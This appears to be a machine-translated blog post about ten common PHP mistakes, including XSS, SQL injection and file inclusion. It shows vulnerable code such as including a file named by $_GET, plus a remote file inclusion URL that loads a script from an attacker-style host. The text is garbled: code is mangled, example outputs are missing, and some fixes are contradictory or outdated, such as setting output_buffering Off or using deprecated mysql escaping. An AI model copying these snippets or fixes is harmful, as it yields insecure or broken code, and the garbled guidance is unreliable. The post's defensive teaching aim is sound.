PHPProgrammers are now increasingly taking on important tasks.
PHPis a great web development language, flexible language, but see the PHP programmers repeating a number of mistakes. I made the following list, listing the 10 errors that PHP programmers often commit, most of which are related to security. Look at how you've made several:
1. Do not turn to HTML entities
A basic common sense: all untrusted input (especially the data submitted by the user from the form), and the output should be preceded by a change of meaning.
- echo$_get[' Usename '
This example has the potential to output:
This is an obvious security risk unless you ensure that your users are correctly entered.
How to FIX:
We need to convert the "<", ">", "and" to the correct HTML representation (< > ', and "), the functions Htmlspecialchars and htmlentities () are just doing the work.
The right way:
- Echo htmlspecialchars ($_get[' username '
2. Do not switch to SQL input
I have discussed this problem in one of the simplest ways to prevent SQL injection (in php+mysql) and have given a simple method. Someone told me that they had set magic_quotes to on in php.ini, so don't worry about it, but not all the inputs are from $_get, $_post or $_cookie!
How to FIX:
And in the simplest way to prevent SQL injection (in php+mysql) I recommend using the mysql_real_escape_string () function
Correct practice:
-
- $sql = "UPDATE users SET
- name= '. mysql_real_escape_string ($name). '
- WHERE id= '. mysql_real_escape_string ($id). ";
- mysql_query ($sql);
3. Incorrect use of Http-header related functions: Header (), Session_Start (), Setcookie ()
Have you encountered this warning? " Warning:cannot AddHeader information-headers already sent [....]
Each time a webpage is downloaded from the server, the server's output is divided into two parts: the head and the body.
The head contains some non-visual data, such as a cookie. The head always arrives first. The body part includes visual HTML, pictures and other data.
If Output_buffering is set to OFF, all http-header-related functions must be called before the output is available. The problem is that you develop in one environment, and when you deploy to another environment, the output_buffering settings may not be the same. The result turns to stop, and neither the cookie nor the session is set correctly.
How to FIX:
Make sure to call the Http-header related function before the output, and make output_buffering = Off.
4. Require or include files that use unsafe data
Again: Don't trust data that is not explicitly declared by yourself. Do not Include or require files that are obtained from $_get,$_post or $_cookie.
For example:
- index.php
-
- include ($_get[' filename ']);
Now any hacker can now use: Http://www.yourdomain.com/index.php?filename=anyfile.txt to get your confidential information, or execute a PHP script.
If Allow_url_fopen=on, you are more dead:
Try this input:
Http://www.yourdomain.com/index. ... n.com%2fphphack.php
Now your page contains the output of the http://www.youaredoomed.com/phphack.php. Hackers can send spam messages, change passwords, delete files, and more. As long as you want to.
How to FIX:
You must control which files can be included in the include or require directives yourself.
Here's a quick, but not comprehensive, workaround:
-
- //include only files, that is allowed.
- $allowedFiles = Array (' File1.txt ',' file2.txt ', 'file3.txt ');
- if (In_array (String)$_get[' filename '],$allowedFiles )) {
- include ($_get[' filename ']);
- }
- Else {
- Exit (' not allowed ');
- }
- ?>
5. Syntax errors
Grammatical errors include all lexical and grammatical errors, so common that I have to list them here. The solution is to seriously learn PHP syntax, carefully do not miss a parenthesis, curly braces, semicolons, quotation marks. There is also a good editor, do not use Notepad!
6. Rarely used or not object-oriented
Many projects do not use PHP's object-oriented technology, the result is that the maintenance of code is very time consuming. PHP supports a growing number of object-oriented technologies and is getting better, and there's no reason to not use object-oriented.
7. Do not use the framework
95% of PHP projects are doing the same four things: Create, edit,list, and delete. Now there are a lot of MVC frameworks to help us do these four things, why don't we use them?
8. Do not know what functionality is available in PHP
PHP's core contains many features. Many programmers repeat the invention of the wheel. Wasted a lot of time. Code before you search PHP mamual, Google search, there may be new discoveries! The exec () in PHP is a powerful function that executes the CMD shell and returns the last line of the execution result as a string. Considering the safety can be used Escapeshellcmd ()
9. Using older versions of PHP
Many programmers are still using PHP4, the development of PHP4 can not fully play the potential of PHP, there are some security risks. Go to PHP5, it doesn't cost a lot. Most PHP4 programs can be migrated to PHP5 without changes or changes. According to Http://www.nexen.net's investigation,
Only 12% of PHP servers use PHP5, so 88% of PHP developers are still using PHP4.
10. Two times the quotation marks
Have you seen ' or ' in the Web page? This is usually because the magic_quotes is set to off in the developer's environment and Magic_quotes=on on the deployed server. PHP will run Addslashes () repeatedly on the data in GET, POST and Cookie.
Original text:
- It ' s A string
- Magic Quotes on:
- It ' s A string
- Run once again
- Addslashes ():
- It\ ' s A string
- HTML output:
Another situation is that the user initially entered the wrong login information, the server detects the wrong input, the output of the same form requires the user to enter again, resulting in user input two times!
Hope that through the above content introduced 10 aspects, can give you a blow to help.
http://www.bkjia.com/PHPjc/445749.html www.bkjia.com true http://www.bkjia.com/PHPjc/445749.html techarticle PHP programmers are increasingly taking on important tasks. PHP is a great web development language, flexible language, but see the PHP programmers repeating a number of mistakes. I have done ...